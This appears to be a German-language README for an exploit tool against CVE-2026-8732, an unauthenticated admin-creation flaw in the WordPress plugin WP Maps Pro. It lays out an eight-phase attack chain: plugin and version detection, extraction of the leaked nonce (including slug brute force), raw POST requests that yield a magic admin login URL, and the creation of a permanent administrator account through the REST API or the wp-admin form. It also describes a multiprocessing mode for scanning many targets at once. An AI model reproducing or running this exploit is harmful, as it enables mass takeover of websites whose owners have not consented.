
Automatisierter 8-Phasen-Exploit für CVE-2026-8732, eine nicht authentifizierte Privilegieneskalation in WP Maps Pro ≤ 6.1.0. Nutzt Multiprocessing und asyncio, um Ziele zu scannen, Nonces zu extrahieren und Admin-Konten zu erstellen.
8-Phasen-Automatisierungsexploit | Multiprocessing + Asyncio | Verifizierte Admin-Erstellung
Das WordPress-Plugin WP Maps Pro in Version ≤ 6.1.0 enthält eine Sicherheitsanfälligkeit zur Rechteausweitung ohne Authentifizierung. Angreifer ohne jegliche Anmeldeinformationen können ein Administrator-Konto erstellen und die Kontrolle über die Website übernehmen.
Die Schwachstelle resultiert aus der Funktion „Temporary Access", die für das Support-Team des Anbieters FlipperCode entwickelt wurde, jedoch ohne ausreichenden Schutz öffentlich zugänglich ist.
| Information | Detail |
|---|---|
| CVE | CVE-2026-8732 |
| CVSS | 9.8 (KRITISCH) — AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H |
| Plugin | WP Maps Pro (wp-google-map-gold) |
| Anbieter | FlipperCode |
| Betroffene Version | ≤ 6.1.0 |
| Gepatchte Version | 6.1.1 |
| Typ | Fehlende Authentifizierung für kritische Funktion (CWE-306) |
| Auswirkung | Admin-Erstellung ohne Authentifizierung → vollständige Kontrolle der Website |
| PoC-Autor | XENON1337 |
┌──────────────────────────────────────────────────────────────┐
│ SCHWACHSTELLE 1 — Endpunkt ohne Authentifizierung │
│ ▸ AJAX-Aktion mit wp_ajax_nopriv_ registriert │
│ ▸ Jeder kann ohne Anmeldung darauf zugreifen │
└──────────────────────┬───────────────────────────────────────┘
│
┌──────────────────────▼───────────────────────────────────────┐
│ SCHWACHSTELLE 2 — Nonce auf öffentlichen Seiten geleakt │
│ ▸ Das Objekt wpgmp_local.nonce wird auf jeder Seite │
│ eingebettet │
│ ▸ Angreifer können den Nonce aus dem HTML-Quelltext │
│ extrahieren │
└──────────────────────┬───────────────────────────────────────┘
│
┌──────────────────────▼───────────────────────────────────────┐
│ SCHWACHSTELLE 3 — Keine Zugriffsprüfung │
│ ▸ Die Callback-Funktion überprüft nur den Nonce │
│ ▸ Kein current_user_can() — keine weiteren Abwehrmaßnahmen │
└──────────────────────────────────────────────────────────────┘
┌─────────┐ ┌──────────┐ ┌──────────┐ ┌──────────┐
│ PHASE 1 │──▶│ PHASE 2 │──▶│ PHASE 3 │──▶│ PHASE 4 │
│ RESOLVE │ │ CHECK WP │ │ DETECT │ │ VERSION │
│ HTTPS? │ │ wp-content│ │ PLUGIN │ │ ≤6.1.0? │
│ HTTP? │ │ wp-login │ │ wpgmp_ │ │ WAF? │
└─────────┘ └──────────┘ └──────────┘ └─────┬────┘
│ ANFÄLLIG
▼
┌──────────────────────────────────────────────────────────┐
│ PHASE 5 — NONCE-EXTRAKTION │
│ │
│ GRUPPE A (API) GRUPPE B (Inhalt) GRUPPE C │
│ ├─ M1: REST-Seiten ├─ M4: Sitemap XML └─ M7: Slug │
│ ├─ M2: REST-Suche ├─ M5: Homepage-Links Brute │
│ └─ M3: rest_route └─ M6: RSS/Atom-Feed Force │
│ │
│ Ziel: wpgmp_local.nonce = „fc-call-nonce" │
└──────────────────────────┬───────────────────────────────┘
│ NONCE GEFUNDEN
▼
┌──────────┐ ┌──────────┐ ┌──────────┐
│ PHASE 6 │──▶│ PHASE 7 │──▶│ PHASE 8 │
│ EXPLOIT │ │ VERIFY │ │ ADD ADMIN│
│ POST AJAX│ │ Magic URL│ │ PERMANENT│
│ nonce+ │ │ Cookie │ │ REST API │
│ check_ │ │ login │ │ WP-Admin │
│ temp=false│ │ check │ │ Form │
└──────────┘ └──────────┘ └──────────┘
│
▼
✅ ADMIN ERSTELLT
Login: wp_xxxx / pass
Rolle: administrator
| Phase | Name | Funktion | Anfragen |
|---|---|---|---|
| 1 | Resolve | Wähle HTTPS/HTTP parallel | 1 |
| 2 | Check WP | Überprüfe, ob das Ziel WordPress ist | 0 |
| 3 | Detect Plugin | Prüfe WP Maps-Indikator in 3 Ebenen | 0-4 |
| 4 | Version + WAF | Lese readme.txt / CSS ?ver= + erkenne WAF | 1 |
| 5 | Nonce-Extraktion | 7 Suchmethoden in 3 parallelen Gruppen | 0-150 |
| 6 | Exploit | POST admin-ajax.php → temporäres Admin-Konto erstellen | 1 |
| 7 | Verifikation | Rufe Magic-URL auf → bestätige Admin-Sitzung | 2 |
| 8 | Admin hinzufügen | REST API (primär) + WP-Admin-Formular (Backup) | 4 |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
action=wpgmp_temp_access_ajax
nonce=<EXTRAHIERTER_NONCE>
check_temp=false
Antwort, wenn anfällig:
{"url":"https://target.com/?wpgmp_access=abc123def456"}
Diese Magic-URL gewährt automatische Anmeldung als
fc_user_XXXXX(Rolle: administrator).
POST /wp-json/wp/v2/users HTTP/1.1
Host: target.com
X-WP-Nonce: <REST_NONCE>
Content-Type: application/json
{
"username": "wp_xxxxxxxx",
"email": "user@localhost",
"password": "Str0ng!Pass#2026",
"roles": ["administrator"]
}
POST /wp-admin/user-new.php HTTP/1.1
Host: target.com
Cookie: [admin_cookies]
Content-Type: application/x-www-form-urlencoded
user_login=wp_xxxxxxxx
email=user@localhost
pass1=Str0ng!Pass#2026
pass2=Str0ng!Pass#2026
pw_weak=1 <-- SCHLÜSSEL: Bestätigung schwaches Passwort
role=administrator
createuser=Add New User
_wpnonce_create-user=<NONCE>
Wichtiger Hinweis:
pw_weak=1muss zwingend enthalten sein — WordPress lehnt schwache Passwörter ohne diesen Parameter ab.
CVE-2026-8732.py
│
├── 📦 NonceFinder — Nonce-Sucher mit 7 Methoden
│ ├── Gruppe A (API): M1 REST-Seiten, M2 REST-Suche, M3 rest_route
│ ├── Gruppe B (Inhalt): M4 Sitemap, M5 Homepage-Links, M6 RSS-Feed
│ └── Gruppe C (Erzwungen): M7 Slug-Brute-Force (30+ allgemeine Slugs)
│
├── ⚔️ Exploiter — Exploit-Maschine mit 8 Phasen
│ ├── resolve() → Phase 1: Protokollauswahl
│ ├── check_wp() → Phase 2: WordPress-Verifikation
│ ├── detect_plugin() → Phase 3: Plugin-Erkennung + früher Nonce
│ ├── detect_version() → Phase 4: Versionserkennung + WAF
│ ├── exploit() → Phase 6: Kern-Exploit
│ ├── verify() → Phase 7: Verifikation Admin-Login
│ └── add_admin() → Phase 8: Permanenten Admin hinzufügen
│
├── 🔧 Worker Process — Multiprocessing-Arbeiterprozesse
│ ├── producer() → Lese Domains aus mp.Queue
│ └── consumer() (N) → Führe parallelen Scan aus
│
└── 🖥️ Scanner — Benutzeroberfläche
├── single() → Einzelzielmodus (interaktiv)
└── multi() → Mehrzielmodus (massenhaft)